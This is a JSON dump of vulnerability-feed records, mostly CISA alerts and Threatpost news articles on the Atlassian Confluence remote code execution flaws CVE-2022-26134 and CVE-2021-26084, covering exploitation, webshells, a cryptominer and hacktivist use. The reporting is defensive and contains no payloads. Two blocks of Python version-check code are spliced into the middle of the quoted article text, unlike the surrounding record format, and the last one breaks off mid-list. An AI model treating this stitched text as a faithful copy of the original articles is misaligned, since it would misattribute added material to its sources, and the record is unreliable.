vulnerability\u2014[CVE-2022-26134](<https://www.cisa.gov/uscert/ncas/current-activity/2022/06/02/atlassian-releases-security-updates-confluence-server-and-data>)\u2014to its [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>), based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise. Note: to view the newly added vulnerabilities in the catalog, click on the arrow in the \"Date Added to Catalog\" column header, which will sort by descending dates. \n\nThere are currently no updates available. Atlassian is working to issue an update. Per BOD 22-01 Catalog of Known Exploited Vulnerabilities, federal agencies are required to immediately block all internet traffic to and from Atlassian\u2019s Confluence Server and Data Center products until an update is available and successfully applied.\n\n[Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities](<https://www.cisa.gov/binding-operational-directive-22-01>) established the Known Exploited Vulnerabilities Catalog as a living list of known CVEs that carry significant risk to the federal enterprise. BOD 22-01 requires FCEB agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the [BOD 22-01 Fact Sheet](<https://cisa.gov/sites/default/files/publications/Reducing_the_Significant_Risk_of_Known_Exploited_Vulnerabilities_211103.pdf>) for more information. \n\nAlthough BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of [Catalog vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) as part of their vulnerability management practice. 
CISA will continue to add vulnerabilities to the Catalog that meet the [specified criteria](<https://www.cisa.gov/known-exploited-vulnerabilities>). \n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2022/06/02/cisa-adds-one-known-exploited-vulnerability-cve-2022-26134-catalog>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-02T00:00:00", "type": "cisa", "title": "CISA Adds One Known Exploited Vulnerability (CVE-2022-26134) to Catalog\u202f\u202f ", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-02T00:00:00", "id": "CISA:695499EEB6D0CB5B73EEE7BCED9FD497", "href": "https://us-cert.cisa.gov/ncas/current-activity/2022/06/02/cisa-adds-one-known-exploited-vulnerability-cve-2022-26134-catalog", "cvss": {"score": 7.5, "vector": 
"AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-15T14:02:20", "description": "Atlassian has released a security advisory to address a remote code execution vulnerability (CVE-2022-26134) affecting Confluence Server and Data Center products. An unauthenticated remote attacker could exploit this vulnerability to execute code remotely. Atlassian reports that there is known exploitation of this vulnerability.\n\nThere are currently no updates available. Atlassian is working to issue an update. CISA strongly recommends that organizations review [Confluence Security Advisory 2022-06-02](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>) for more information. CISA urges organizations with affected Atlassian\u2019s Confluence Server and Data Center products to block all internet traffic to and from those devices until an update is available and successfully applied.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2022/06/02/atlassian-releases-security-updates-confluence-server-and-data>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-02T00:00:00", "type": "cisa", "title": "Atlassian Releases Security Advisory for Confluence Server and Data Center, CVE-2022-26134", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", 
"exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-02T00:00:00", "id": "CISA:71FB648030101FA9B007125DFA636193", "href": "https://us-cert.cisa.gov/ncas/current-activity/2022/06/02/atlassian-releases-security-updates-confluence-server-and-data", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-01T13:56:33", "description": "Atlassian has released new Confluence Server and Data Center versions to address [remote code execution vulnerability CVE-2022-26134](<https://www.cisa.gov/uscert/ncas/current-activity/2022/06/02/atlassian-releases-security-updates-confluence-server-and-data>) affecting these products. An unauthenticated remote attacker could exploit this vulnerability to execute code remotely. 
Atlassian reports that there is known exploitation of this vulnerability.\n\nCISA strongly urges organizations to review [Confluence Security Advisory 2022-06-02](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>) and upgrade Confluence Server and Confluence Data Center.\n\n**Note:** per [BOD 22-01 Catalog of Known Exploited Vulnerabilities](<https://www.cisa.gov/binding-operational-directive-22-01>), federal agencies are required to immediately block all internet traffic to and from Atlassian\u2019s Confluence Server and Data Center products AND either apply the software update to all affected instances OR remove the affected products by 5 pm ET on Monday, June 6, 2022.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2022/06/03/atlassian-releases-new-versions-confluence-server-and-data-center>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-03T00:00:00", "type": "cisa", "title": "Atlassian Releases New Versions of Confluence Server and Data Center to Address CVE-2022-26134", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", 
"availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-30T00:00:00", "id": "CISA:9E73FFA29BFAFFF667AC400A87F5434E", "href": "https://us-cert.cisa.gov/ncas/current-activity/2022/06/03/atlassian-releases-new-versions-confluence-server-and-data-center", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-26T18:09:54", "description": "On August 25, 2021, Atlassian released security updates to address a remote code execution vulnerability (CVE-2021-26084) affecting Confluence Server and Data Center. Recently, CVE-2021-26084 has been detected in exploits in the wild. A remote attacker could exploit this vulnerability to take control of an affected system.\n\nCISA urges users and administrators to review [Atlassian Security Advisory 2021-08-25](<https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html>) and immediately apply the necessary updates.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/09/03/atlassian-releases-security-updates-confluence-server-and-data>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": 
"NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-03T00:00:00", "type": "cisa", "title": "Atlassian Releases Security Updates for Confluence Server and Data Center", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-03T00:00:00", "id": "CISA:D7188D434879621A3A83E708590EAE42", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/09/03/atlassian-releases-security-updates-confluence-server-and-data", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2022-06-08T10:28:56", "description": "Threat actors are using public exploits to pummel a critical zero-day remote code execution (RCE) flaw that affects all versions of a popular collaboration tool used in cloud and hybrid server environments and allows for complete host takeover.\n\nResearchers from Volexity uncovered the flaw in Atlassian Confluence Server and Data Center software over the Memorial Day weekend after they detected suspicious activity on two internet-facing web servers belonging to a customer running the software, they said in a [blog post](<https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/>) published last week.\n\n\u201cThe file was a well-known copy of the JSP variant of the China Chopper webshell,\u201d researchers wrote. \u201cHowever, a review of the web logs showed that the file had barely been accessed. 
The webshell appears to have been written as a means of secondary access.\u201d\n\nAtlassian released a [security advisory](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>) the same day that Volexity went public with the flaw, warning customers that all supported versions of Confluence Server and Data Center after version 1.3.0 were affected and that no updates were available. This prompted the U.S. Department of Homeland Security\u2019s Cybersecurity and Infrastructure Security Agency (CISA) to issue [a warning of its own](<https://www.cisa.gov/uscert/ncas/current-activity/2022/06/02/atlassian-releases-security-updates-confluence-server-and-data>) about the flaw.\n\nA day later, Atlassian released fixed versions of the affected products: 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4 and 7.18.1; it\u2019s also strongly recommending that customers update as soon as they can. If that\u2019s not possible, the company provided in the advisory what it stressed is a \u201ctemporary\u201d workaround for the flaw by updating a list of specific files that correspond to specific versions of the product.\n\n## Threat Escalation\n\nIn the meantime, the situation is escalating quickly into one that security professionals said could reach epic proportions, with exploits surfacing daily and hundreds of unique IP addresses already hammering the vulnerability. 
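
The fixed-version list above can be turned into a fleet check. The following Python is an added example, not Atlassian's or Threatpost's code: it parses a Confluence version string, looks up the fixed release on its minor branch, flags anything below it, and, for branches with no fixed release (7.5 through 7.12 have none in the list above), points at the nearest higher fixed version. The 1.3.0 lower bound comes from the advisory wording quoted above and is treated as inclusive here. The hostnames and versions in the inventory are constructed; the function names and the tolerance for build suffixes in version strings are assumptions.

```python
import re

# Fixed releases from Atlassian's 2022-06-03 update, as listed above,
# keyed by minor branch (major, minor).
FIXED_VERSIONS = {
    (7, 4): (7, 4, 17),
    (7, 13): (7, 13, 7),
    (7, 14): (7, 14, 3),
    (7, 15): (7, 15, 2),
    (7, 16): (7, 16, 4),
    (7, 17): (7, 17, 4),
    (7, 18): (7, 18, 1),
}
# The advisory text quoted above puts the affected range at "after 1.3.0";
# treated as inclusive here (assumption).
FIRST_AFFECTED = (1, 3, 0)


def parse_version(text):
    """'7.13.7' -> (7, 13, 7). Tolerates a build suffix such as '7.4.17-beta'
    (assumed format); missing components are treated as 0."""
    nums = [int(n) for n in re.findall(r'\d+', text)[:3]]
    return tuple(nums + [0] * (3 - len(nums)))


def fmt(version):
    return '.'.join(str(n) for n in version)


def assess(version_text):
    """Return (status, target_version) for one Confluence instance.

    status is one of:
      fixed                       at or above the fix on its own branch
      vulnerable                  below the fix on a branch that has one
      vulnerable-no-fix-on-branch branch has no fixed release; move to the
                                  nearest higher fixed version
      not-in-fix-list             newer than every fixed release listed;
                                  check the current advisory
      outside-advisory-range      below 1.3.0, not in the stated range
    """
    v = parse_version(version_text)
    if v < FIRST_AFFECTED:
        return 'outside-advisory-range', None
    fixed = FIXED_VERSIONS.get(v[:2])
    if fixed is not None:
        return ('fixed' if v >= fixed else 'vulnerable'), fmt(fixed)
    higher = [f for f in FIXED_VERSIONS.values() if f > v]
    if not higher:
        return 'not-in-fix-list', None
    return 'vulnerable-no-fix-on-branch', fmt(min(higher))


def triage_fleet(inventory):
    """inventory maps host -> version string; returns host -> (status, target)."""
    return {host: assess(ver) for host, ver in inventory.items()}


# Constructed inventory (hostnames and versions are made up for the example).
SAMPLE_INVENTORY = {
    'wiki-01': '7.13.5',
    'wiki-02': '7.18.0',
    'wiki-03': '7.18.1',
    'wiki-04': '7.12.5',
    'wiki-05': '7.4.17',
}

if __name__ == '__main__':
    for host, (status, target) in triage_fleet(SAMPLE_INVENTORY).items():
        action = f' -> upgrade to {target}' if status.startswith('vulnerable') else ''
        print(f'{host}: {status}{action}')
```

Feed `triage_fleet` whatever your CMDB or the Confluence `/rest/api/settings/systemInfo` endpoint reports as the version (the endpoint is Atlassian's documented REST API, not something the page shows), and treat every `vulnerable*` status as blocked-from-the-internet until upgraded, which is the interim control CISA describes above.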
Many versions of the affected products also remain unpatched, which creates a dangerous situation.\n\n\u201cCVE-2022-26134 is about as bad as it gets,\u201d observed Naveen Sunkavalley, chief architect of security firm [Horizon3.ai](<https://u7061146.ct.sendgrid.net/ls/click?upn=4tNED-2FM8iDZJQyQ53jATUST9fX64-2FX7G8oio3HdExkfpXlsDdy0DMjoZZzh-2Fv3fxrEs2_6bll2uIcECOBsx1gx1IC2zx-2FnKyCXka4AgKvEYqpnW0-2BDbBUicS42bKww9XV5LeOm8YSoCZbw6XkWDSfAMcb8GJOp9iX7pVlW-2BkiIYpN1sif0KFuJYXLhOJYPn-2B9Sn-2Bao84F16BCF9mzWrtMMXrFm85GjE6MDSbjKAOEQgg2YFlHR0Qtls0ZgujFNL07BqN4si4MSOc-2F08z53oSeQi6Vxrf5tVuwdy9pbRo-2F8DNNu3J5mzixD3PJS7t4Hs2TYsOWw0ryNyw1-2BF9EHtf5wuqbWsxGPMD6EQsD7Nyoevetefkt7MGs-2FHajCJChJ0WWQ-2F4es5VBDN8zEwARSv6a1s6u74AUhwTSDRHOo3PP1Q1lKsA-3D>), in an email to Threatpost. Key issues are that the vulnerability is quite easy both to find and exploit, with the latter possible using a single HTTP GET request, he said.\n\nMoreover, the recently released public exploits allow attackers to use the flaw for arbitrary command execution and host takeover against a number of Confluence versions, including the latest unpatched version, 7.18.0, according to tests that Horizon3.ai has conducted, Sunkavalley said.\n\nIndeed, Twitter was blowing up over the past weekend with discussions about public exploits for the vulnerability. 
On Saturday, Andrew Morris, the CEO of cybersecurity firm [GreyNoise](<https://www.greynoise.io/>)[ tweeted](<https://u7061146.ct.sendgrid.net/ls/click?upn=4tNED-2FM8iDZJQyQ53jATUZeLQXFApkVnt0p2uzldsLzexNPwWwME1VqzuxM4EPRfjhNCvLBy4YB49i5LBdhVDdk3bdxl9mMqYmby3BCNH00GddZh2Met-2FQVciEWaSqj2-2BDc33IvotYb-2FqKipRNwgEsWia58Lavv8WM5npBgeBdYkvQQSrhYbzaBUUuVaSV4Rk2ztpg8TXpsMCaYdZzeKKPgLWVToUg5Ht0f9g7gPwMwtAvcwxVmnWEDON1KFUmdHIfQ-2FKAQvcO7jS7WvGtrxWKAF52KobJgne5rQpdjvE11Y-2B8djmGzI1Q21AzX5T50A9-2BpHIOYzyAUqoUEWZpFnRzzLqrMu3icBZ57LmFKNxGTRPimDUjR7T8eDeQjnWttOekKn_6bll2uIcECOBsx1gx1IC2zx-2FnKyCXka4AgKvEYqpnW0-2BDbBUicS42bKww9XV5LeOm8YSoCZbw6XkWDSfAMcb8GJOp9iX7pVlW-2BkiIYpN1sif0KFuJYXLhOJYPn-2B9Sn-2Bao84F16BCF9mzWrtMMXrFm85GjE6MDSbjKAOEQgg2YFlHR0Qtls0ZgujFNL07BqN4si4MSOc-2F08z53oSeQi6VxpsA5L19rY7-2Fmx-2BEGIHXPubRKCQX-2B7BpbJqtYfPildu8zaULbUO4ygo24RQuqSIch-2BeFoJjwkkjlXG4ACkLuxahlCVA2m3cewG-2B9vzjCwKJ7F5JEpNGn-2FjGZEpkypXKWLD-2BIhk5XHKrarqem-2FZDDkHA-3D>) that they had begun to see 23 unique IP addresses exploiting the Atlassian vulnerabilities. 
On Monday, Morris [tweeted again](<https://twitter.com/Andrew___Morris/status/1533504231876993025>) that the number of unique IP addresses attempting to exploit the flaw had risen to 400 in just a 24-hour period.\n\n## **Potential for a SolarWinds 2.0?**\n\nSunkavalley pointed out that the most obvious impact of the vulnerability is that attackers can easily compromise public-facing Confluence instances to gain a foothold into internal networks, and then proceed from there to unleash even further damage.\n\n\u201cConfluence instances often contain a wealth of user data and business-critical information that is valuable for attackers moving laterally within internal networks,\u201d Sunkavalley said.\n\nWhat\u2019s more, the vulnerability is a source-code issue, and attacks at this level \u201care some of the most effective and long reaching attacks on the IT ecosystem,\u201d observed Garret Grajek, CEO of security firm [YouAttest.](<https://u7061146.ct.sendgrid.net/ls/click?upn=4tNED-2FM8iDZJQyQ53jATUcpjElsOr6shryTSooYkkS1tJo6a6FxvdH5IYSQBxGNY4H_z_6bll2uIcECOBsx1gx1IC2zx-2FnKyCXka4AgKvEYqpnW0-2BDbBUicS42bKww9XV5LeOm8YSoCZbw6XkWDSfAMcb8GJOp9iX7pVlW-2BkiIYpN1sif0KFuJYXLhOJYPn-2B9Sn-2Bao84F16BCF9mzWrtMMXrFm85GjE6MDSbjKAOEQgg2YFlHR0Qtls0ZgujFNL07BqN4si4MSOc-2F08z53oSeQi6VxtVZHvCB0Vt7i-2Bw8BIBLgZxGqzVWH-2B5yvKoY-2FpPXxD7KFogqV9a0rRV2rH4Hj2p6StEDVbzSc-2FkJf66Q9LkeRnRg9qfA-2Fm-2FP06VV5XsA8rTwU9DmqJ3uYX6CQKoNXRKL350M-2FNS011olthdA2Jkl3v0-3D>)\n\nThe now-infamous [Solarwinds supply-chain attack](<https://threatpost.com/solarwinds-default-password-access-sales/162327/>) that started in December 2020 and extended well [into 2021](<https://threatpost.com/solarwinds-hack-linked-turla-apt/162918/>) was an example of the level of damage and magnitude of threat that embedded malware can have, and the Confluence bug has the potential to create a similar scenario, he said.\n\n\u201cBy attacking the source code base the hackers are able to manipulate the code to become, in fact, 
agents of the hacking enterprise, cryptographically registered as legitimate components on the IT system,\u201d Grajek said.\n\nFor this reason, it\u2019s \u201cimperative that enterprises review their code and most importantly the identities that have control of the source system, like Atlassian, to ensure restrictive and legitimate access to their vital code bases,\u201d he asserted.\n", "cvss3": {}, "published": "2022-06-07T11:21:47", "type": "threatpost", "title": "Attackers Use Public Exploits to Throttle Atlassian Confluence Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-07T11:21:47", "id": "THREATPOST:22B3A2B9FF46B2AE65C74DA2E505A47E", "href": "https://threatpost.com/public-exploits-atlassian-confluence-flaw/179887/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-06-15T15:52:57", "description": "According to a new [advisory](<https://www.radware.com/getattachment/bde65cb6-ace4-4dea-bce3-5f3b6cc1c951/Advisory-DragonForce-OpsPatuk-OpsIndia-final.pdf.aspx>) from Radware, a hacktivist group called DragonForce Malaysia, \u201cwith the assistance of several other threat groups, has begun indiscriminately scanning, defacing and launching denial-of-service attacks against numerous websites in India.\u201d In addition to DDoS, their targeted campaign \u2013 dubbed \u201cOpsPatuk\u201d \u2013 involves advanced threat actors \u201cleveraging current exploits, breaching networks and leaking data.\u201d\n\nDragonForce Malaysia \u2013 best known for their hacktivism in support of the Palestinian cause \u2013 have turned their attention on India this time, in response to a controversial comment made by a Hindu political spokesperson about the Prophet Mohammed.\n\nAccording to the advisory, OpsPatuk remains ongoing today.\n\n## The Casus Belli\n\nIn a televised debate last month, Nupur Sharma \u2013 a spokesperson for the Hindu nationalist Bharatiya Janata Party (BJP) \u2013 made controversial remarks 
regarding the age of the Prophet Mohammed\u2019s third wife, Aisha. Outrage followed, including statements from leaders across the Muslim world, widespread protests, and the ousting of Sharma herself from the BJP.\n\nThen, beginning on June 10, DragonForce Malaysia entered the fray. Their new offensive against the government of India was first enshrined in a [tweet](<https://twitter.com/DragonForceIO/status/1535273727755096064?ref_src=twsrc%5Etfw>):\n\n_Greetings The Government of India. We Are DragonForce Malaysia. This is a special operation on the insult of our Prophet Muhammad S.A.W. India Government website hacked by DragonForce Malaysia. We will never remain silent. Come Join This Operation ! #OpsPatuk Engaged_\n\n(image from @DragonForceIO on Twitter)\n\nThe new advisory confirms that, alongside the DDoS attacks, the group has carried out \u201cnumerous defacements across India,\u201d pasting its logo and messaging onto targeted websites.\n\nThe group also \u201cclaimed to have breached and leaked data from various government agencies, financial institutions, universities, service providers, and several other Indian databases.\u201d\n\nThe researchers also observed other hacktivists \u2013 \u2018Localhost\u2019, \u2018M4NGTX\u2019, \u20181887\u2019, and \u2018RzkyO\u2019 \u2013 joining the party, \u201cdefacing multiple websites across India in the name of their religion.\u201d\n\n## Who are DragonForce Malaysia?\n\nDragonForce Malaysia is a hacktivist group in the vein of Anonymous. They\u2019re connected by political goals, with a penchant for sensationalism. Their social media channels and website forums \u2013 used for everything \u201cranging from running an eSports team to launching cyberattacks\u201d \u2013 are visited by tens of thousands of users.\n\nIn the past, DragonForce has launched attacks against organizations and government entities across the Middle East and Asia. 
Their favorite target has been Israel, against which they have launched multiple operations \u2013 #OpsBedil, #OpsBedilReloaded and #OpsRWM \u2013 aimed at the nation and its citizens.\n\nAccording to the authors of the advisory, DragonForce are \u201cnot considered an advanced or a persistent threat group, nor are they currently considered to be sophisticated. But where they lack sophistication, they make up for it with their organizational skills and ability to quickly disseminate information to other members.\u201d Like Anonymous with its Low Orbit Ion Cannon, DragonForce relies on open-source DoS tools \u2013 Slowloris, DDoSTool, DDoS-Ripper, Hammer and others \u2013 alongside choreographed, flashy website defacements.\n\nSome members, \u201cover the last year, have demonstrated the ability and desire to evolve into a highly sophisticated threat group.\u201d Among other things, that\u2019s included leveraging publicly disclosed vulnerabilities. In OpsPatuk, for example, they\u2019ve been working with the recently disclosed [CVE-2022-26134](<https://threatpost.com/public-exploits-atlassian-confluence-flaw/179887/>).\n\n\u201cDragonForce Malaysia and its associates have proven their ability to adapt and evolve with the threat landscape in the last year,\u201d concluded the authors. 
With no signs of slowing down, \u201cRadware expects DragonForce Malaysia to continue launching new reactionary campaigns based on their social, political, and religious affiliations in the foreseeable future.\u201d\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-15T13:59:37", "type": "threatpost", "title": "DragonForce Gang Unleash Hacks Against Govt. of India", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-15T13:59:37", "id": "THREATPOST:8C179A769DB315AF46676A862FC3D942", "href": "https://threatpost.com/hackers-india-government/179968/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-07T16:21:15", "description": "A just-patched, critical remote code-execution (RCE) vulnerability in the Atlassian Confluence server platform is suffering wide-scale exploitation, the Feds have warned \u2013 as evidenced by an attack on the popular Jenkins open-source automation engine.\n\nAtlassian Confluence is a collaboration platform where business teams can organize their work in one place: \u201cDynamic pages give your team a 
place to create, capture, and collaborate on any project or idea,\u201d according to [the website](<https://www.atlassian.com/software/confluence/guides/get-started/confluence-overview>). \u201cSpaces help your team structure, organize and share work, so every team member has visibility into institutional knowledge and access to the information they need to do their best work.\u201d\n\nIn other words, it can house a treasure trove of sensitive business information as well as supply-chain information that could be used for follow-on attacks on partners, suppliers and customers.\n\n## **Jenkins Hack \u2013 Just a Cryptomining Hit**\n\nFor its part, Jenkins identified a \u201csuccessful attack against our deprecated Confluence service,\u201d it said in [a statement](<https://www.jenkins.io/blog/2021/09/04/wiki-attacked/>) over the weekend. Thankfully, \u201cwe have no reason to believe that any Jenkins releases, plugins or source code have been affected,\u201d the team added.\n\nThe attackers were able to exploit the bug in question ([CVE-2021-26084](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26084>)) to install a Monero cryptominer in the container running the service, according to the statement \u2013 no cyberespionage in this case. The team took the server offline immediately and rotated all passwords, and there\u2019s no plan to bring Confluence back, it said.\n\n\u201cAn attacker would not be able to access much of our other infrastructure,\u201d the statement continued, adding that the server hasn\u2019t been used in daily operations since late 2019. \u201cConfluence did integrate with our integrated identity system which also powers Jira, Artifactory, and numerous other services.\u201d\n\nThe hack comes on the heels of an urgent pre-Labor Day warning from U.S. 
Cyber Command that the flaw is firmly in the sights of cybercriminals aiming at U.S. businesses, less than 10 days after it was disclosed on August 25:\n\n> Mass exploitation of Atlassian Confluence CVE-2021-26084 is ongoing and expected to accelerate. Please patch immediately if you haven\u2019t already\u2014 this cannot wait until after the weekend.\n> \n> \u2014 USCYBERCOM Cybersecurity Alert (@CNMF_CyberAlert) [September 3, 2021](<https://twitter.com/CNMF_CyberAlert/status/1433787671785185283?ref_src=twsrc%5Etfw>)\n\nThat echoes researchers at Bad Packets, who said [via Twitter](<https://twitter.com/bad_packets/status/1433157632370511873>) that they began seeing mass scanning and exploitation of CVE-2021-26084 around Sept. 1.\n\nOn Tuesday, JPCERT/CC [issued guidance](<https://www.jpcert.or.jp/english/at/2021/at210037.html>) that active exploits were being deployed in Japan as well.\n\n## **RCE with CVE-2021-26084**\n\nThe bug is an Object-Graph Navigation Language (OGNL) injection vulnerability that affects Confluence Server and Data Center (affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5). 
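Checking an installed build against the ranges just listed, and against the fixed releases for CVE-2022-26134 given earlier on this page (7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4 and 7.18.1), is easy to get wrong by eye. The Python below is an added example, not Atlassian's or Threatpost's code; it encodes both sets of version boundaries exactly as the articles state them. Its one assumption, labelled in the code, is that for CVE-2022-26134 any release line with no fixed build in that list (for example 7.5 through 7.12) counts as vulnerable, which is consistent with the advisory's statement that all versions after 1.3.0 are affected.

```python
import re


def parse_version(s: str) -> tuple:
    """'7.13.7' -> (7, 13, 7); missing components are padded with 0."""
    parts = [int(p) for p in re.findall(r'\d+', s)[:3]]
    return tuple(parts + [0] * (3 - len(parts)))


# CVE-2021-26084, as listed in the article: [lower, upper) vulnerable ranges.
CVE_2021_26084_RANGES = [
    ((0, 0, 0), (6, 13, 23)),     # anything before 6.13.23
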